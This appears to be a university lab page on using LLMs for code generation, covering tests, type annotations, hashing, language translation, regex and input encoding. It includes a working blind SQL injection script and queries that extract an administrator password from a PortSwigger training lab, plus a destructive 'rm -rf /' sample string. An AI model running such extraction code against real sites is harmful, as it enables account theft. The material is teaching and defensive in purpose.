08.1: Code Generation

In this week's exercises, your group will try out the various tasks for code generation using LLMs. Begin by completing the initial parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:

Week 8 slides

Add screenshots that you can use to walk through how you performed the exercise. Your group will present its results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue to the rest of the exercises in order to prepare for the week's homework assignment.

Code generation is one of the more useful tasks a model can do. However, it's difficult to trust the code it produces without having an idea of what a correct version of the code looks like. In this exercise, a simple Python class that implements a username-password authentication function using a SQLite3 database is shown. Within the class:

A connection is created to a SQLite3 database stored in the file 'users.db' within the class constructor.
If the database does not exist or doesn't contain a users table, the constructor calls the class's initializeUsers() method, which creates the users table with two text fields: username and password. It then calls the addUser() method to add the admin user with the password 'password123'.
An addUser() method is implemented that takes a username and a password and inserts them into the database if the username does not exist in the database.
A checkUser() method is implemented that takes a username and password, retrieves the password for the username from the database, then checks it against the given password. The method returns True if they match, False otherwise.

import sqlite3

DB_FILE = 'users.db'    # file for our Database

class Users():
    def __init__(self):
        self.connection = sqlite3.connect(DB_FILE)
        cursor = self.connection.cursor()
        try:
            cursor.execute("select count(rowid) from users")
        except sqlite3.OperationalError:
            self.initializeUsers()

    def initializeUsers(self):
        cursor = self.connection.cursor()
        cursor.execute("create table users (username text, password text)")
        self.addUser('admin','password123')

    def addUser(self, username, password):
        cursor = self.connection.cursor()
        params = {'username':username}
        cursor.execute("SELECT username FROM users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) == 0:
            params = {'username':username, 'password':password}
            cursor.execute("insert into users (username, password) VALUES (:username, :password)", params)
            self.connection.commit()
            return True
        else:
            return False

    def checkUser(self, username, password):
        params = {'username':username}
        cursor = self.connection.cursor()
        cursor.execute("select password from users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) != 0:
            password_from_db = res.pop()[0]
            if password == password_from_db:
                return True
        return False

The goal of the exercise is to generate a prompt that allows an LLM to produce the code above.

Ask an LLM to generate a prompt that can produce the code above
Then, in a new chat, send the prompt to the LLM. Does it generate an equivalent piece of code?
Handcraft a prompt that allows an LLM to generate code that is as close to the original as possible

Unit tests that are built into a program allow one to catch code changes that may break the functionality of the application. For example, consider the code below that implements a square root.

import math

def square_root(n):
    if isinstance(n, int) and n >= 0:
        return math.sqrt(n)
    else:
        raise ValueError("Input must be a non-negative integer.")

To add unit tests to this code, one could use the unittest package in Python and add assertions that should hold on a variety of test cases. An example is shown below.

import unittest

class TestSquareRoot(unittest.TestCase):
    def test_zero(self):
        self.assertEqual(square_root(0), 0.0)

    def test_non_integer(self):
        with self.assertRaises(ValueError):
            square_root(4.5)
        with self.assertRaises(ValueError):
            square_root("string")
        with self.assertRaises(ValueError):
            square_root([4])

    def test_negative_integer(self):
        with self.assertRaises(ValueError):
            square_root(-1)

if __name__ == "__main__":
    unittest.main()

For our password authentication example, we wish to test the expected behavior of the code across a variety of tests to ensure correctness. For example, the code should:

Ensure the default admin user is created with the password 'password123'
Ensure an account that already exists cannot be created again
Ensure that one can add a new username and password and that they are correctly returned from the database when subsequently queried
Ensure that a given username and password pair is checked properly for combinations of correct and incorrect values

While one could generate these tests manually, an LLM may be able to generate them instead.

Ask an LLM to instrument the password program to produce unit tests that can be run to validate code correctness
Do the unit tests generated provide sufficient coverage for the program?
Run the generated program and analyze the results for correctness.
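As a baseline to compare the LLM's output against, a hand-written test suite might look like the sketch below. To keep it self-contained, it includes a condensed copy of the Users class with one change that is not in the original: a hypothetical db_file parameter, so each test can use SQLite's ':memory:' database instead of the shared users.db file.

```python
import sqlite3
import unittest

class Users:
    """Condensed copy of the exercise class; db_file is an added, hypothetical parameter."""
    def __init__(self, db_file='users.db'):
        self.connection = sqlite3.connect(db_file)
        try:
            self.connection.execute("select count(rowid) from users")
        except sqlite3.OperationalError:
            self.connection.execute("create table users (username text, password text)")
            self.addUser('admin', 'password123')

    def addUser(self, username, password):
        cur = self.connection.execute(
            "select username from users where username=:u", {'u': username})
        if cur.fetchall():
            return False
        self.connection.execute(
            "insert into users (username, password) values (:u, :p)",
            {'u': username, 'p': password})
        self.connection.commit()
        return True

    def checkUser(self, username, password):
        cur = self.connection.execute(
            "select password from users where username=:u", {'u': username})
        row = cur.fetchone()
        return row is not None and row[0] == password


class TestUsers(unittest.TestCase):
    def setUp(self):
        # A fresh in-memory database per test keeps state from leaking between tests.
        self.users = Users(':memory:')

    def tearDown(self):
        self.users.connection.close()

    def test_default_admin(self):
        self.assertTrue(self.users.checkUser('admin', 'password123'))

    def test_duplicate_rejected(self):
        self.assertFalse(self.users.addUser('admin', 'other'))

    def test_add_then_check(self):
        self.assertTrue(self.users.addUser('alice', 's3cret'))
        self.assertTrue(self.users.checkUser('alice', 's3cret'))

    def test_wrong_credentials(self):
        self.assertFalse(self.users.checkUser('admin', 'wrong'))
        self.assertFalse(self.users.checkUser('nobody', 'password123'))
```

Saved to a file, the suite can be run with python -m unittest. Each test method maps to one of the expected behaviors listed earlier, which makes gaps in an LLM-generated suite easier to spot.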

Python 3.5 and later support type annotations, which help developers reason about the data types within their programs. Adding type annotations to code written before they were available is something that can potentially be automated by an LLM. Consider the code below that fetches a URL using the requests package, parses the page using BeautifulSoup, and then returns the page's <title> tag if it exists.

import requests
from bs4 import BeautifulSoup

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None

A fully annotated version is shown below with each parameter and return value assigned a type, along with any variable that has been utilized. In addition, the Optional type is used when the return type can be either the given type (e.g. str) or None.

import requests
from bs4 import BeautifulSoup, Tag
from typing import Optional

def getUrlTitle(url: str) -> Optional[str]:
    resp: requests.Response = requests.get(url)
    resp.raise_for_status()
    soup: BeautifulSoup = BeautifulSoup(resp.text, 'html.parser')

    title_tag: Optional[Tag] = soup.find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None

Using the code given previously for the password authentication program,

Ask an LLM to generate a fully type-annotated version of the program

One of the potential uses for a code-based LLM is to take existing code and implement new functionality. Consider the code below that sequentially downloads URLs and pulls out their <title> tags.

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    ...

def getSequential(urls):
    titles = []
    for u in urls:
        titles.append(getUrlTitle(u))
    return titles

urls = ['https://pdx.edu', 'https://oregonctf.org']
print(getSequential(urls))

Using an LLM, one can convert the code to use asynchronous calls, as shown below.

import asyncio
import aiohttp
from bs4 import BeautifulSoup

async def getUrlTitle(session, url):
    async with session.get(url) as resp:
        html = await resp.text()
        title_tag = BeautifulSoup(html, 'html.parser').find('title')
        ...

async def getAsync(urls):
    async with aiohttp.ClientSession() as session:
        tasks = [getUrlTitle(session, url) for url in urls]
        titles = await asyncio.gather(*tasks)
        return titles

print(asyncio.run(getAsync(['https://pdx.edu', 'https://oregonctf.org'])))
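To see why the asynchronous version can finish sooner without touching the network, the sketch below replaces the HTTP request with asyncio.sleep. The fake_fetch, fetch_sequential, fetch_concurrent, and timed names are hypothetical stand-ins for illustration, and the third URL is an added example.

```python
import asyncio
import time

async def fake_fetch(url, delay=0.2):
    # Stand-in for an HTTP request: waits without blocking the event loop.
    await asyncio.sleep(delay)
    return f"title of {url}"

async def fetch_sequential(urls):
    # Awaits each coroutine to completion before starting the next one.
    return [await fake_fetch(u) for u in urls]

async def fetch_concurrent(urls):
    # Starts all coroutines together; gather returns results in input order.
    return await asyncio.gather(*(fake_fetch(u) for u in urls))

def timed(coro):
    # Runs a coroutine and reports how long it took in seconds.
    start = time.perf_counter()
    result = asyncio.run(coro)
    return result, time.perf_counter() - start

urls = ['https://pdx.edu', 'https://oregonctf.org', 'https://example.com']
seq_titles, seq_time = timed(fetch_sequential(urls))
con_titles, con_time = timed(fetch_concurrent(urls))
print(f"sequential: {seq_time:.2f}s, concurrent: {con_time:.2f}s")
```

The sequential run waits for the delays one after another, while the concurrent run overlaps them, so its total time is close to that of the slowest single request.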

The prior password program stores cleartext passwords rather than password hashes. If the system were compromised, the cleartext password of every user would be exposed, allowing an adversary to perform credential stuffing. Given the original password code:

Ask an LLM to convert the password program into one that uses PBKDF2 with SHA-256 and 100,000 iterations to store hashes in the database rather than cleartext passwords
After generating the version, have the LLM produce unit tests that validate the implementation. What does it test?
Test the resulting implementation by running it
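When reviewing what the LLM produces, it may help to have a rough picture of the hashing step itself. The sketch below uses hashlib.pbkdf2_hmac from the standard library with the parameters named above. The hash_password and verify_password helpers and the 16-byte random salt are assumptions for illustration, not part of the original program; a converted program would need to store both the salt and the digest for each user.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000

def hash_password(password, salt=None):
    # A fresh random salt per user keeps identical passwords from sharing a hash.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, expected_digest):
    # Recompute the hash with the stored salt and compare in constant time.
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)

salt, stored = hash_password('password123')
print(verify_password('password123', salt, stored))   # True
print(verify_password('wrong', salt, stored))         # False
```

Useful things to look for in the generated unit tests include whether two users with the same password end up with different stored values and whether the cleartext password ever appears in the database.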

LLMs have been successfully used to translate text from one language to another. Since programming languages are just another type of language, one potential use for LLMs is to automatically translate a program to another programming language.

JavaScript

In this exercise, we'll translate our original password code written in Python into JavaScript. We'll begin by asking an LLM to create a JavaScript equivalent for the password program. As part of the prompt, give the LLM some additional instructions to guide its translation such as:

Utilize the sqlite3 module
Add test cases to validate correctness and ensure they run serially
Log all calls to the console and include the calling parameters

Using the above as a guide,

Ask an LLM to convert the password program from Python to JavaScript
Does the code generated implement the application faithfully?

To run the code, bring up the course VM and install the latest Node.js version.

sudo apt update -y
sudo apt install nodejs npm -y
sudo npm install -g n
sudo n stable
hash -r

Create a directory to run the application from, and install the JavaScript packages that are required.

mkdir js
cd js
npm install sqlite3

Copy the code the LLM produced into the file users.js. Then, run the code.

node users.js

Do the tests generated pass?

TypeScript

We'll attempt to repeat the exercise using TypeScript instead.

Ask an LLM to convert the password program from Python to TypeScript
Does the code generated implement the application faithfully?

Install the TypeScript packages

npm install ts-node typescript

Copy the code the LLM produced into the file users.ts. Then, run the npx command to transpile the code to JavaScript and execute it.

npx ts-node users.ts

Does the code run successfully?
Do the tests generated pass?

LLMs can be used to speed up the process of exploit development. Open the PortSwigger level https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses. After reading the lab description and the hint, click the "Access the lab" button. The level has a SQL injection vulnerability in its tracking cookie (TrackingId) that allows one to exfiltrate the password for the administrator account programmatically. The code below performs a brute-force linear search on each character of the password in order to solve the level.

import requests
from bs4 import BeautifulSoup
import time
import urllib.parse

def test_string(url, prefix, letter):
    query = f"x' union select 'a' from users where username = 'administrator' and password ~ '^{prefix}{letter}'--"
    print(f'Testing ^{prefix}{letter}')
    mycookies = {'TrackingId': urllib.parse.quote_plus(query)}

    resp = requests.get(url, cookies=mycookies)
    soup = BeautifulSoup(resp.text, 'html.parser')

    if soup.find('div', text='Welcome back!'):
        print(f'Found character {letter}')
        return True
    else:
        return False

site = ''
url = f'https://{site}/'
start_alpha = 'abcdefghijklmnopqrstuvwxyz0123456789'
prefix = ''

begin_time = time.perf_counter()
while True:
    # A match on '$' means the prefix is the complete password
    if test_string(url, prefix, '$'):
        break
    for letter in start_alpha:
        check = test_string(url, prefix, letter)
        if check:
            prefix += letter
            break

print(f'Password is {prefix}')
print(f"Time elapsed is {time.perf_counter()-begin_time}")

Develop a prompt that allows an LLM to create the above program
Test the generated program to ensure that it finds the administrator password (but do not solve the level)

As part of the homework assignment, students create a version of the prior program that performs a binary search instead of a linear search, reducing the run-time for finding each character of the password from O(n) to O(log n), where n is the number of characters in the character set. For example, the following injection uses the ~ operator in SQL to perform a regular expression match on the first letter of the administrator's password.

import string

charset = string.ascii_lowercase + string.digits

# mid is the current split point of the binary search over charset
query = f"""x' UNION SELECT username from users where username = 'administrator' and password ~ '^[{charset[:mid]}]' --"""

Using the linear search program and instructing the LLM to generate a program that implements a binary search algorithm per character using the ~ operator,

Develop a prompt that produces a binary search implementation of it
Test the resulting implementation by running it and ensure that the administrator password matches what was found via the linear search
Solve the level
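When judging whether the LLM's program really performs a binary search, it can help to reason about the algorithm separately from the HTTP requests. The sketch below runs the per-character search against a local mock oracle that uses Python's re module in place of the injected ~ query. SECRET, oracle, next_char, and recover are hypothetical names for illustration, and the sketch assumes every password character is in the character set.

```python
import re
import string

CHARSET = string.ascii_lowercase + string.digits
SECRET = 'ab3z9'      # hypothetical password, known only to the mock oracle
queries = 0

def oracle(pattern):
    # Local stand-in for the injected "password ~ pattern" check.
    global queries
    queries += 1
    return re.search(pattern, SECRET) is not None

def next_char(prefix):
    # Halve the candidate set with a character class until one character remains.
    candidates = CHARSET
    while len(candidates) > 1:
        mid = len(candidates) // 2
        if oracle(f'^{prefix}[{candidates[:mid]}]'):
            candidates = candidates[:mid]
        else:
            candidates = candidates[mid:]
    return candidates

def recover():
    # Extend the prefix one character at a time until '^prefix$' matches.
    prefix = ''
    while not oracle(f'^{prefix}$'):
        prefix += next_char(prefix)
    return prefix

print(recover(), queries)
```

With 36 candidates, each character takes at most 6 oracle calls, compared with up to 36 for the linear search. In the real program, the oracle would be the request that checks for the 'Welcome back!' message.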

Another task an LLM may help with is generating regular expressions based on strings that a user supplies. Consider the strings below that are used to polymorph the User-Agent HTTP header in an attempt to evade detection. Filtering software could be configured with a single regular expression that covers all of these strings.

We4b58
We7d7f
Wea4ee
We70d3
Wea508
We6853
We3d97
We8d3a
Web1a7
Wed0d1
We93d0
Wec697
We5186
We90d8
We9753
We3e18
We4e8f
We8f1a
Wead29
Wea76b
Wee716

Query the LLM to see if it is able to generate a Python regular expression that matches all of the strings above. Then visit https://regex101.com/ to validate the expression against the data provided.

Does it generate a correct regular expression?
If not, reduce the number of strings until it provides one

There are limits to how accurately a model can perform this task. Repeat the task, but insert strings that can cause the LLM to produce an incorrect result.

What input data can cause an LLM to produce an erroneous expression?
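A candidate expression can also be checked locally with Python's re module rather than only on regex101. The sketch below tests one plausible pattern against the strings listed above. The pattern assumes the strings are "We" followed by exactly four lowercase hexadecimal characters, which is inferred from the samples rather than stated by their source, and the rejected strings are made-up examples.

```python
import re

samples = """
We4b58 We7d7f Wea4ee We70d3 Wea508 We6853 We3d97
We8d3a Web1a7 Wed0d1 We93d0 Wec697 We5186 We90d8
We9753 We3e18 We4e8f We8f1a Wead29 Wea76b Wee716
""".split()

# Assumed structure: literal "We" followed by four lowercase hex characters.
pattern = re.compile(r'We[0-9a-f]{4}')

# fullmatch requires the whole string to match, not just a prefix.
matched = [s for s in samples if pattern.fullmatch(s)]
print(f"{len(matched)} of {len(samples)} samples matched")

# Strings that should be rejected: too short, non-hex character, unrelated agent.
rejected = [s for s in ['We4b5', 'We4b5g', 'Mozilla/5.0'] if not pattern.fullmatch(s)]
print(f"{len(rejected)} of 3 non-samples rejected")
```

Checking strings that should not match is as important as checking those that should, since an overly broad expression such as We.* would also pass the first test.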

When an application takes input controlled by an end user and uses it within the application, the input must either be properly encoded (where sensitive characters are converted into innocuous ones) or filtered (where sensitive characters are simply removed). Without doing so, attacks such as command injection, SQL injection, and cross-site scripting (XSS) can occur. In this exercise, we will examine an LLM's ability to produce code that performs appropriate encoding and filtering.

Code that encodes and escapes input must be written for the context in which the input is used, since the characters that need encoding depend on where the input is consumed. In this exercise, consider a string named user_input whose value is given by the user. Prompt an LLM to generate Python code that encodes user_input so it can be:

Safely used as an argument in a Linux command
Safely included in an HTML document
Safely included in an HTML attribute (e.g. f'')
Safely included as a URL parameter (e.g. f'https://foo.com/?name={user_input}')
Safely included as data in a JavaScript program
Safely included as a field in a CSV (comma separated value) file
Explain what the code for each example does that prevents attacks
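For comparison with the LLM's answers, the sketch below shows one standard-library call per context. The sample value of user_input is made up, and the choices here (for example, additionally escaping '<' in the JavaScript case) are one reasonable option under stated assumptions rather than the only correct one.

```python
import csv
import html
import io
import json
import shlex
import urllib.parse

user_input = """x"; rm -rf / #<script>alert('hi')</script>&a=b,c"""

# POSIX shell argument: wrapped in single quotes so the shell treats it as one word.
shell_arg = shlex.quote(user_input)

# HTML text node: &, < and > become entities.
html_text = html.escape(user_input, quote=False)

# HTML attribute value: quote characters are escaped as well.
html_attr = html.escape(user_input, quote=True)

# URL parameter value: safe='' percent-encodes reserved characters such as & and /.
url_param = urllib.parse.quote(user_input, safe='')

# JavaScript string literal: JSON encoding, plus '<' escaped so that a
# "</script>" sequence cannot end an inline script block early.
js_data = json.dumps(user_input).replace('<', '\\u003c')

# CSV field: the csv module quotes fields containing commas or quotes.
# Assumption: spreadsheet formula injection is out of scope and needs separate handling.
buf = io.StringIO()
csv.writer(buf).writerow([user_input])
csv_field = buf.getvalue()

for name in ('shell_arg', 'html_text', 'html_attr', 'url_param', 'js_data', 'csv_field'):
    print(f"{name}: {globals()[name]!r}")
```

In each case the original value can be recovered by the consumer (the shell, browser, URL parser, JavaScript engine, or CSV reader), which is what distinguishes encoding from filtering.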

In the previous exercise, an LLM was used to perform encoding and escaping on a user's input to ensure it could be safely used in a particular application context. Another approach to sanitizing input is to filter out sensitive characters entirely. Prompt an LLM to generate Python code that filters a string stored in user_input so that it can be:

Safely used as an argument in a Linux command
Safely included in an HTML document
Safely included in an HTML attribute (e.g. f'')
Safely included as a URL parameter (e.g. f'https://foo.com/?name={user_input}')
Safely included as data in a JavaScript program
Safely included as a field in a CSV (comma separated value) file
Explain what the code for each example does that prevents attacks
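One common way to filter is with an allowlist, keeping only characters known to be harmless rather than trying to enumerate every dangerous one. The sketch below is a minimal illustration of that idea. The filter_allowlist and filter_shell_arg helpers and the particular allowed set are assumptions, and a real application would pick the allowed set per context.

```python
import re

def filter_allowlist(value, allowed=r'A-Za-z0-9_.-'):
    # Remove every character that is not explicitly allowed.
    return re.sub(f'[^{allowed}]', '', value)

def filter_shell_arg(value):
    # Also strip leading dashes so the result cannot be read as a command option.
    return filter_allowlist(value).lstrip('-')

user_input = "report.txt; rm -rf / <b>&'\""
print(filter_allowlist(user_input))       # report.txtrm-rfb
print(filter_shell_arg('--help; ls'))     # helpls
```

Unlike encoding, filtering is lossy: the original value cannot be recovered, and legitimate input (such as a name containing an apostrophe) may be altered. That trade-off is worth checking for in the code the LLM generates.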